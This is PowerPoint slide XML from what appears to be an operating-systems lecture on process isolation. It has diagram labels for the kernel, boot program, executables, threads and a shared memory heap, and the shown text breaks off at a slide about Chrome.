        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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F54DE7D-FB04-4A46-DD7C-15FC1E6A58BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180975" y="5591175"/>
            <a:ext cx="18167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"Boot" program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kernel OS System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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B7CDB1-9928-CB2E-1D48-D4443E02B9AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180975" y="1434108"/>
            <a:ext cx="2173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 ".exe" Programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Flowchart: Card 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53D3729-9B5E-C318-DC17-5CD5BAB4EB65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559654" y="1999430"/>
            <a:ext cx="880441" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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owchart: Card 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65263A7F-E406-0EB0-E8AB-90798C2C7F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094883" y="5637015"/>
            <a:ext cx="880441" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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241B06-7ABD-C441-9AEF-F57810D7B731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2061542" y="5787165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0110101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1010101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710226-913D-B52D-B03A-9CE144F5CAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492448" y="2134339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0110101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1010101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Flowchart: Card 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEA09A40-44E9-DF9F-51CD-B0905F06ABE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355866" y="1988342"/>
            <a:ext cx="880441" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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0DBD1C-6BF8-8228-06EB-44286D56FC67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6322525" y="2138492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0110101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1010101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Flowchart: Card 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C773678C-B8B3-5708-40FB-FCF29C8E369A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9587655" y="1988342"/>
            <a:ext cx="880441" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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EE8CA1-42C1-46E2-D8F4-E5B1E9807C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9520449" y="2123251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0110101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1010101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24283622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624AF-00DA-B3F5-8F20-6BB2DC523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09629714-0464-FB7B-BD53-D4B701A1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28" y="5354236"/>
            <a:ext cx="2095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E822C5-751E-A268-FA6A-BC85E4507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88"/>
            <a:ext cx="10515600" cy="1162052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Process Isolations Principles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0BA43-502F-92CB-8B07-F191A431FA3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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F31968-1DA5-EEDB-D1BA-16341032DA83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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8289CA9-0E7B-E166-791B-41409198C68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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BCF20F-7C21-CBC7-D32B-4ABDAFE743D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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4908B-3230-DD76-7D64-16F2D1EB466F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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71FAB-6EBE-1110-9FAE-71534EEA3BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677"/>
            <a:ext cx="10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F8D2F-6F27-B028-CCAA-921D38839B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079"/>
            <a:ext cx="10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CF2E00-674F-759A-1F9C-C4917DCB81B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677"/>
            <a:ext cx="10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919BEA-9F23-AED1-956A-30EFDEA89C01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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B69194-B59E-BCFC-0DFF-D0F688E8D5FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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E33975F-FD3B-5A99-C76E-178E5205826B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2989236" y="4106093"/>
            <a:ext cx="229285" cy="7160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7CA4F09-13BA-AD0D-9890-61E032B60F4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5707479" y="4106093"/>
            <a:ext cx="229285" cy="7160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EEC56032-3AA5-B7F3-525C-70BA617C35E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4070747" y="1804987"/>
            <a:ext cx="1028700" cy="52387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AAE74E-614A-8E37-04BB-E26C26384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025" y="5160168"/>
            <a:ext cx="1861447" cy="1497883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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FF1C8B4D-725F-E4F4-ACB1-F5081750BB34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2496885">
            <a:off x="9452789" y="4545371"/>
            <a:ext cx="1333479" cy="52387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&quot;Not Allowed&quot; Symbol 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{445002E5-8B57-0F74-92EE-932AF30E0119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9845899" y="4272432"/>
            <a:ext cx="709612" cy="65008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&quot;Not Allowed&quot; Symbol 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71D15A56-782F-703E-08B8-AE5D0092F887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4215382" y="1427554"/>
            <a:ext cx="709612" cy="65008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4EA2E857-0852-D82E-B1DB-36DAC4B65610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19110435" flipH="1">
            <a:off x="1147278" y="4543335"/>
            <a:ext cx="1308255" cy="52387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&quot;Not Allowed&quot; Symbol 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D5F8DDF-ED36-135D-DE74-1966DD1EE55D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331490" y="4285054"/>
            <a:ext cx="709612" cy="65008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3194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7FA77-7B52-86D6-C430-EA104BE0A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B19C6-12C2-B0E3-56DA-89AFA702C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88"/>
            <a:ext cx="10515600" cy="1162052"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Inside Process ... Full Sharing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(No Isolation)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13E924-ED31-D196-3B4F-BD7710651D1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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3725CC-2262-5218-F248-DD4DE9C4A91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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E19452C-DFCA-4F0C-FFBC-5C7D0DBA6C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151540" y="3187097"/>
            <a:ext cx="1175716" cy="7346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2627B5-2FB7-A0A0-31D4-A95B3E0A4909}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1876710" y="2648978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38AB21-CE0D-E2AC-8054-27A659A53E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1917476" y="2347141"/>
            <a:ext cx="14909" cy="214312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C0558A8-B401-9670-A6CB-649384521226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180975" y="5591175"/>
            <a:ext cx="18167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"Boot" program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kernel OS System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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997B1A-EB97-25EF-C50F-8E93CEF2EFBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180975" y="1434108"/>
            <a:ext cx="2173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 ".exe" Programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Flowchart: Card 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1949FC3D-524B-D9C9-C824-A85872A96C07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094883" y="5637015"/>
            <a:ext cx="880441" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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11785B-D6D0-774A-7AD2-05B54A78B062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2061542" y="5787165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0110101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1010101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Flowchart: Card 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A34710C-4546-659E-A97E-864DDC8141DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3325478" y="2176855"/>
            <a:ext cx="880441" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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ED00DF-73AB-482D-F111-5CB3A1E44364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3292137" y="2327005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0110101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1010101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F302F-020C-CE3F-1E3F-F495CD605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76" y="3161658"/>
            <a:ext cx="1111914" cy="11119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5DFA8D-27FF-C9E1-CABA-C8AF9684991A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8851676" y="2506684"/>
            <a:ext cx="14909" cy="214312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A42540F-6531-A78D-B3FB-3FA4DF163C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4817397" y="1762126"/>
            <a:ext cx="3730045" cy="2887682"/>
          </a:xfrm>
          <a:prstGeom prst="rect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B4C1FDC-D400-0152-4C2F-16CB13360502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2151540" y="1762126"/>
            <a:ext cx="2630010" cy="14333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084F052-ABB8-D936-D511-A05070A87FAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166187" y="3921719"/>
            <a:ext cx="2615363" cy="7280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7C3FC9-6E70-A909-80D8-0BCCD8FF2C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5448188" y="2788219"/>
            <a:ext cx="0" cy="8780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4D44117-471D-53DB-0744-CF20274AB51B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367225" y="2785039"/>
            <a:ext cx="157163" cy="31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DEB2A37-DD06-11C4-2D93-7D8AA32BD9E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4996614" y="2436479"/>
            <a:ext cx="96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6B35866-0E5C-44D6-508E-EE5A6FEF6EDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894999" y="3140072"/>
            <a:ext cx="0" cy="8780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7D8A844-E523-38E4-5327-41A8C63D575C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5814036" y="3136892"/>
            <a:ext cx="157163" cy="31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9CB410F-2D71-FB1B-B29E-43F0A480A519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443425" y="2788332"/>
            <a:ext cx="96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Thread2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421840B-691D-4ACA-7587-0050634A8CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6341810" y="3474220"/>
            <a:ext cx="0" cy="8780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793446-A44E-DA60-9E65-642EEF6977C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6260847" y="3471040"/>
            <a:ext cx="157163" cy="31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5597ADA-7534-3A1A-FCCC-280CD20A6014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5890236" y="3122480"/>
            <a:ext cx="96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Thread3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Flowchart: Card 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45415C8C-F4C5-FA81-5B67-EFCDCAFE5943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357881" y="1923415"/>
            <a:ext cx="923931" cy="368356"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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9767EF-AF95-0F22-0C89-A4617DF91EDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301142" y="194964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0110101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Flowchart: Card 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429CC442-268C-EDB1-3F0F-32108737ADE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6377134" y="2174216"/>
            <a:ext cx="923931" cy="368356"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartPunchedCard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16BA6F-627E-8E44-5762-E028E0F45EE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6320395" y="220044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0110101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6DDBE4-BC0C-F6B6-F42D-77483BA9F113}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6930963" y="3115942"/>
            <a:ext cx="1295174" cy="10236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Arrow: Curved Down 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4372E7-2CCC-0918-785A-97D477537485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1570334">
            <a:off x="6193133" y="2695190"/>
            <a:ext cx="1261624" cy="369332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Arrow: Curved Down 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC55A4F9-2FEF-948D-4E7C-5BF9DC28C060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1077355">
            <a:off x="6365612" y="2761213"/>
            <a:ext cx="869951" cy="369332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Arrow: Curved Down 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FBA1E3-986D-213C-8ABB-951B83A2E52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="452819">
            <a:off x="6526096" y="2862450"/>
            <a:ext cx="538026" cy="369332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3DC094-3AA6-CEF1-E668-D4A38926E344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7050734" y="3216306"/>
            <a:ext cx="1041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Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Arrow: Curved Down 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7663C0FF-0497-032A-E71F-3F16976E4A85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5443213" y="3884860"/>
            <a:ext cx="406003" cy="22261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2" name="Arrow: Curved Down 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B740B3-7B5E-5691-7231-DB1B5E2BEE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5962529" y="4080267"/>
            <a:ext cx="303327" cy="222614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3" name="Arrow: Curved Down 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC0A39C-42FC-C57E-BB64-A319A0EC46C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5457541" y="4232667"/>
            <a:ext cx="847401" cy="22261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0543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9619-2EC2-93B2-7F1F-0DC2DE984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3"/>
            <a:ext cx="10515600" cy="1785937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Notice in Chrome (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
